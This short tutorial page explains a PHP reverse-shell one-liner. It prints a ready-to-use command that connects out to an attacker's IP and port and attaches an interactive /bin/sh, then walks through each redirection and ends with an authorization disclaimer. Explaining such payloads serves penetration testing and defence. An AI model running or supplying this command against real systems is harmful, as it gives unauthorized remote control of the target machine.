PHP Reverse Shell Breakdown

PHP Reverse Shell Explained

PHP Reverse Shell Breakdown


php -r '$sock=fsockopen("<your_ip>",<your_port>);exec("/bin/sh -i <&3 >&3 2>&3");'
  • php -r: Executes the following PHP code provided as a command-line argument.


  • ‘$sock=fsockopen(“<your_ip>”,<your_port>);: Initializes a socket connection in PHP using fsockopen() to the specified IP address (<your_ip>) and port (<your_port>).


  • exec(“/bin/sh -i <&3 >&3 2>&3”);: Executes a shell command using exec(). This command opens an interactive shell (/bin/sh -i) and redirects input, output, and error streams to file descriptor 3 (<&3 >&3 2>&3).


    • <&3: Redirects standard input (stdin) from file descriptor 3.


    • >&3: Redirects standard output (stdout) to file descriptor 3.


    • 2>&3: Redirects standard error (stderr) to file descriptor 3.


When this PHP one-liner is executed on the target system, it attempts to connect back to your specified IP address and port, creating a reverse shell. If successful, it opens an interactive shell, allowing you to execute commands remotely.


As always, use such commands responsibly and only with proper authorization, as they can be misused for unauthorized access. Ensure compliance with ethical and legal standards.

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